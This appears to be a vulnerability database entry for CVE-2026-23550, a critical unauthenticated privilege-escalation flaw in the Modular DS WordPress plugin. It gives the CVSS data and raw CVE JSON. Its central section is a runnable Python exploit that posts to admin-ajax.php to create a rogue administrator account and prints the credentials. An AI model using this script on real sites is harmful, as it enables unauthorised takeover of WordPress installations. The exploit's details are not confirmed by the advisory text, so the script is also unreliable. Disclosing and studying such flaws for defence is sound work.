Security Vulnerability Report
中文
CVE-2026-23550 CVSS 9.8 CRITICAL

CVE-2026-23550

Published: 2026-01-14 09:16:03
Last Modified: 2026-04-23 15:36:39

Description

Incorrect Privilege Assignment vulnerability in Modular DS Modular DS modular-connector allows Privilege Escalation.This issue affects Modular DS: from n/a through <= 2.5.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Modular DS (modular-connector) <= 2.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23550 Privilege Escalation PoC # Target: WordPress with Modular DS plugin <= 2.5.1 import requests import sys TARGET_URL = "http://target-wordpress-site.com" ATTACKER_USERNAME = "evil_admin" ATTACKER_EMAIL = "[email protected]" ATTACKER_PASSWORD = "P@ssw0rd123" def exploit_privilege_escalation(): """ This PoC demonstrates the privilege escalation vulnerability in Modular DS plugin. The plugin fails to properly validate user capabilities before allowing role modifications. """ # Step 1: Identify the vulnerable endpoint # The Modular DS plugin exposes AJAX handlers without proper capability checks endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Step 2: Prepare the privilege escalation payload # Create a new administrator account payload = { "action": "modular_ds_create_admin", "username": ATTACKER_USERNAME, "email": ATTACKER_EMAIL, "password": ATTACKER_PASSWORD, "role": "administrator" } # Step 3: Send the exploit request # Note: No authentication required due to missing capability checks try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Exploit sent successfully") print(f"[+] Created admin user: {ATTACKER_USERNAME}") print(f"[+] Password: {ATTACKER_PASSWORD}") print(f"[+] Login at: {TARGET_URL}/wp-admin") else: print(f"[-] Exploit failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") sys.exit(1) if __name__ == "__main__": print("[*] CVE-2026-23550 - Modular DS Plugin Privilege Escalation") print("[*] Target: Modular DS plugin <= 2.5.1") exploit_privilege_escalation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23550", "sourceIdentifier": "[email protected]", "published": "2026-01-14T09:16:02.520", "lastModified": "2026-04-23T15:36:39.077", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Modular DS Modular DS modular-connector allows Privilege Escalation.This issue affects Modular DS: from n/a through <= 2.5.1."}, {"lang": "es", "value": "Vulnerabilidad de asignación de privilegios incorrecta en Modular DS permite la escalada de privilegios. Este problema afecta a Modular DS: desde n/a hasta 2.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}